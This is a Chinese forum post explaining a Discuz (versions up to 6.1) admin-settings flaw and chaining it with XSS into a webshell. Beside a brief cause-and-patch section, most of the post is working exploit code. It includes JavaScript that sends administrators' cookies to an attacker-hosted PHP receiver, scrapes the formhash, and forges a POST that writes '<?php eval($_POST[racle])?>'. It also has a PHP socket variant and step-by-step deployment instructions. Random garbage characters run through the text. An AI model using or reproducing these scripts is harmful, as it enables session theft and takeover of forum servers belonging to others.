Discuz XSS得webshell& `0 ?6 d7 k& A2 y l `8 C
By racle @tian6.com' ]6 w8 |8 N% {' F
欢迎转帖.但请保留版权信息.
# U" \6 j: S1 t受影响版本 iscuz<=6.1.0,gbk+utf+big5
' r$ g' {) Z: j9 g; S" q8 q @; |# C; e5 Z3 ]& c
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.2 T! O0 t8 c7 C3 L' H3 r9 V
$ F' u" R6 d6 g$ v/ v0 c4 }
- N& b% ^: G+ ~3 Z0 }* n/ S) t3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=87066 E( R& K. T' K4 h( v* z
当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
# M! Q. {' i5 S& [
. [" H& m$ Z7 M: U1 R6 H! `分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..0 r8 p+ D$ C8 _# r2 s
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
5 h% s1 a9 N5 t% U- U, a, n
o A6 ?* R+ C7 M5 i) M
8 U% c. \& H. ~* n7 L----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------! L1 z; q% a8 p
+ U3 V8 z+ m) M: E0 O1 F5 P0 Q0 ]8 k; [4 ?9 Q
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.5 t. S' G7 K& h1 W& O
+ Q' }7 g. s5 r! y7 I; m2 N* lproblem2 ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
. s3 \7 N- m" c$ ]* V2 H Q2 s. I' }( C* |0 @! W e6 F: n
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
7 g7 W8 O5 ?+ d! R7 z4 n' q% ?1 E" w8 b) ?# C* U6 c( c
5 d7 ~4 I$ ^& m- K- u下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {/ Z; S. W1 K8 d4 b* J& }! X5 T
5 \% `+ R v0 a( d
global $runwizardfile, $runwizardhistory;/ m2 ]. m* k8 N* ]4 O
9 `; }: }7 Z+ e- y$ L2 u& H M $fp = fopen($runwizardfile, 'w');
& _& t! F. _# t. v! b. u2 g8 @
( @) u& [) X6 n fwrite($fp, serialize($runwizardhistory));. L( {* H+ C1 `3 _
Y( D6 ^) J0 j4 E6 b fclose($fp);
5 j. l2 T, l$ V" A/ f$ E
6 d2 y+ C- Q+ r) u2 `6 m}
" Y( d# ]& Z- Z7 [8 k8 F/ f, n9 ?复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.& {$ j1 o( n% m3 K6 [" t
以下是修补的办法:function saverunwizardhistory() {- }& O5 w4 ~9 @. W
7 P' Q9 U1 R. P7 B. J global $runwizardfile, $runwizardhistory;6 |6 [4 }1 @' W% A; v
/ G4 E/ F8 i& e" g1 e( e $fp = fopen($runwizardfile, 'w');4 a! I: D4 y) k& [; Z5 F
* b+ @' K" M! w $s = '<?php exit;?>';' f6 ^0 h+ ^% n) z$ E
# w* S# z6 V) Q/ s9 M; l3 [
$s .= serialize($runwizardhistory);; `/ w. T1 o9 `! C6 P
$ y% l, e4 K: l9 v; }1 q" r( l fwrite($fp, $s);5 z1 c3 e2 B/ R4 I% x; T
$ X6 v! X, M& L% i3 b5 A! \- x fclose($fp);
4 n+ A3 b: d0 ]" ^. r
$ Q# {; s2 r7 Q }}
% S) E. W |# a) L, f复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
2 i( b3 H) w; f8 t: x5 q2 K3 y/ v3 h, ?) n2 a4 s. V
. j9 T4 Q+ P" A0 u9 |$ k) _
; D0 ~4 r: ]& P% t, r3 B: }
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
) X* x3 a6 F2 l, R. F% E' V% ]' u h/ _
" H# {# V" t- m; m0 e
以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
! g R& @) \; L$ u2 O1 P8 k+ D9 l* h. p" f. [& M
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
$ e0 t+ f! I) E/ i8 s9 A7 S; p5 l; Z- r. G; X% T- b
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
4 X# g, X3 Z$ I# ]3 B
- w8 O8 R) k( I: h! U7 a首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
9 u8 @$ ^6 {4 l7 l' G3 B, O: y, f1 m$ P. i1 {
var url="http://目标网站/admincp.php";
/ W1 @' h' f( ~( @. W6 F$ z# \
5 p) O" b" |* {4 `! q/*获得cookies*/
- _( Y' E1 g- r7 ~& w" W# F% H* i6 f% ?
function getURL(s) {
5 K* @7 a8 @* b7 p! ]- K$ P# d# B' U' f5 s
var image = new Image();+ W2 n( i7 C2 e3 o, _# I$ V6 t w
9 k. _2 ?: I# }" g4 n. o L
image.style.width = 0;
/ h b/ D5 p( c- y {- b: D
% i! V' p e1 H% _# P- k" Q5 Eimage.style.height = 0;7 c5 _" r$ `% k9 S) s
! j4 @- D2 L- C/ z* ?
image.src = s;
8 B1 |5 j' x A2 ^' l4 q7 E8 j% }% i( M' M, ^
}3 M B+ o- A$ D
* E- X, H( \4 W! b& p k' `+ ?getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php
3 \: y- b$ J' { T- O复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
" t: {5 n/ b2 @复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 8 `6 j: l0 F0 S2 s! r
$ ?% ~: q" O% L% d1 c
7 K+ h8 i' K- v: R; g获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
. j8 J" v* m$ K$ q5 L' J0 \! O1 ]* `% f' r# J) d+ u+ s7 ?- ?1 M
8 @0 h7 }0 p4 b
0 n# ^/ o$ O; q0 v V$ a- k/*hash*/
# f/ L+ ^& c* D! L) h# C+ [ w$ T9 Z/ z- m9 M v \4 n/ y! r
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");) ]: n. K9 q/ g- A
4 a$ ^" u8 R$ |/ c' B
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);( S) h, F. b% U
2 S8 g) h0 |8 G. h |; K
xmlHttpReq.send();
8 u) @* J; C$ X. P. ?+ V1 ~$ l
4 R# z2 Y$ F( z" `3 a; r; ~$ Ivar resource = xmlHttpReq.responseText;. H" E `. i: q1 u% y# C
7 O) I" k S! R1 O t5 U
var numero = resource.search(/formhash/);1 S8 f% d+ ?7 O) [& ^0 g- V. k
. P, Z5 e1 t' r: P0 g: ~# v) m% Svar formhash=encodeURIComponent(resource.substr(numero+17,8));
Q$ v( d* F0 c/ B4 i1 k+ R6 \
! s+ J$ K+ ]: K9 {% i( l
6 t" {* r0 `! S2 X) R' Y% O4 t. J# M5 l4 @: O. l* J& {
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据 5 y) v; s* u8 x3 s
: m% }" z) h5 m( V9 l! O2 nxmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
1 f; P2 I9 {; Y4 w6 ^
- s+ z" @. X5 m% Z$ bxmlHttpReq.setRequestHeader("Referer", url);
. X7 j- G, b: O' ~+ ]9 s! p I9 I# Q" u6 |$ G% p* H ^; w% R: W5 _1 c" K/ f
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
; z4 Q* i- q& z1 @; r4 h. Z
5 Q R( F; S2 ExmlHttpReq.setrequestheader("content-length",post.length); 3 X8 x4 \' }6 y1 c
2 A( l! u! Y% @; d1 {2 U/ bxmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
7 {3 o3 U/ Q( x# c) H6 n w: ?: u R; P* N- R* A
xmlHttpReq.send(post);//发送数据
R$ V. E. U0 ~: ], z1 F6 |复制代码这里HASH我假设正确,这样提交,也无须cookies% q( ?. w% T! a
# l/ V$ U' t4 Q) `7 {% B) J% ^- ~
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);+ e5 _( {, _' p! B* d1 Q, A" o
" z6 w' q% x( @, G/ v" T+ nif (!$sock) die("$errstr ($errno)\n");
# |/ F0 T8 E- W& `. f- G5 I3 p" d! O5 Q1 P7 i X
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
; ~. }/ L" l; Q* P7 b& ]5 E, N7 u1 U# ?3 a
- s' K2 ? _; G6 q
: l4 t4 K& K9 e2 m8 Ofwrite($sock, " OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
# A1 R, m. W, F0 A6 g3 q% f
' l' u# l4 G6 `9 j' R- Ffwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
- R6 G3 U# p) @, E8 z* e# `' U3 R; Q# {( L; L$ m4 O+ r
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");1 c3 F$ U" c! g, x3 t* X0 z
; [' `; z" P7 I0 D
fwrite($sock, "Accept-Language: zh-cn\r\n");
) B$ k8 g( ~. w/ T$ w6 r
. }) V8 z, c t+ S ], j# |fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
' [! a% d' z5 n! m) L
4 u+ z) b L. e' O3 f) kfwrite($sock, "Accept-Encoding: gzip, deflate\r\n"); `) c# D% S0 X ^: {$ @8 u
( ?7 K6 x5 h& I4 u* ]4 ?fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");
9 w) \! }7 L0 m( N: }" O3 }5 u/ k* R w( l9 ? E3 x4 o
fwrite($sock, "Host: $url\r\n");8 a1 B0 G) K" h! y. _4 D
& u: @# |6 g! v* G/ ]* Ofwrite($sock, "Content-Length: ".strlen($data)."\r\n");! X( }' a1 f# I5 V1 \
# M7 G9 d# _) k9 }" j5 {# O9 Vfwrite($sock, "Connection: Keep-Alive\r\n");, @ R! i! K5 t9 H
' q% e9 M* U5 G
fwrite($sock, "Cache-Control: no-cache\r\n");
% D3 Q; Z: n9 h0 B# p. m- h m- g0 p( _, l
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");9 T* x; n r. ~* N
3 k, X4 a: j; \. K3 d
fwrite($sock, $data);
, e. z2 [3 `! A& a( X J! o4 D
. h9 R6 |' d% \4 S- p& T. b+ j& w5 D: d, j4 T8 O
4 K- }) q, E6 j+ z( z$headers = "";
" S# U6 l' e: j3 }+ x+ N. W; k/ I% @
while ($str = trim(fgets($sock, 4096)))
1 Z8 B8 i( b( y" f3 i' g8 X- O) f# ^$ J' G/ }
$headers .= "$str\n";
# C5 S" x/ {1 r# d
5 A0 ~9 g' f, xecho "\n";7 j5 |5 s+ B4 |$ O: V( j: N
' H+ D- {4 K& R# d$ y$ E
$body = "";) F$ `4 b' o; X& S: ]
4 l* R8 x3 R9 s/ z; ?) S( \
while (!feof($sock))
3 U- ^5 `, v0 E1 D, V, S# o8 u# Q) _% f" b0 v
$body .= fgets($sock, 4096);
2 Q6 L+ |$ U5 ~! y$ T" i7 g4 L1 F c! [: O; e' c* [& t
fclose($sock);) ?0 K& f. P4 m7 G$ o9 M
( c7 d. T: `2 b! g: B- N; ~
echo $body;
' Q) S8 \; L( l& T! l复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^ S6 `1 I8 w$ Z3 r
7 Q, h, H T) F! e& N' H3 x$ @; v. V' _
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------" d9 [# `6 K3 L- Y1 h
0 D/ L: f: c. t! R( U0 S( b3 H/ B. o' ^8 J' T
1 HP SOCKET利用方法首先打开racle.js' n2 I9 f' O! L+ u2 ?
) `4 C# h, q0 b6 a4 S3 K0 i: V$ {
var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
- U* c* H0 c- p$ n, O0 W% h$ @9 ^( s# s9 m
" T' |4 ^8 F6 d& H
+ R1 h9 Y. [+ |; r" M( c6 ^: d然后打开racle@tian6.php
: ~( g; q2 U0 M% N% P$ _; O& y3 h
3 j: X+ ~- D# y1 c' u; y$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com
' d6 `! b: c. S+ s" F- t& F6 _9 t1 f Y' ^3 U' ^$ r: r1 {9 ^
( T% Y* n0 t) q, [3 Z# N. r9 J% \4 ]
- ~5 Z; C: x, ?如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
( Z+ W7 G% V/ ]) c4 g& l
8 O2 @" g2 P) bgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
6 D! h0 \/ F$ t1 a$ o/ V2 D: S4 q3 t
为- G/ `/ T( P# ~- d* }" G5 f) E& S
8 c2 C$ `8 z; ~ E/ c9 tgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));5 a) J: K( ?/ m' ^8 U' ^1 w( a# v) d
复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
/ [: R7 B& O# F3 f- U
% p- _ z/ j- A" b' M2 U; X) `9 o9 N1 |- \# g$ u$ h; Z0 r
, _& a5 w- G' P- Z* v0 C) f
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:2 w( e& E3 @2 n+ H+ ^
9 d6 G- A/ ?1 U$ U- t0 o
var formhash=encodeURIComponent(resource.substr(numero+17,8));
' j% N' C7 ~. S% i/ Y8 X( g- \
" Z2 z6 r$ w7 ]为* n% i- p4 f: T& i" l$ _1 d& ^
# u6 W- X) N3 \- a6 {var formhash=encodeURIComponent(resource.substr(numero+9,8));
! W( s7 D0 w3 f8 V" p8 p, I; G5 W复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧./ B, s* @/ P1 o9 P
& f& U5 h* C# @; [* O9 r: H如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
, A+ {. G; n. l% G5 E1 i3 i; V
* s) s6 c. g! t1 P( f如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点. g m. O$ I1 i% W& h% _; [% [1 B
4 {& e2 \. Z; N不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
a5 @% ^$ Q" o j
+ H5 c/ U3 H! M5 O |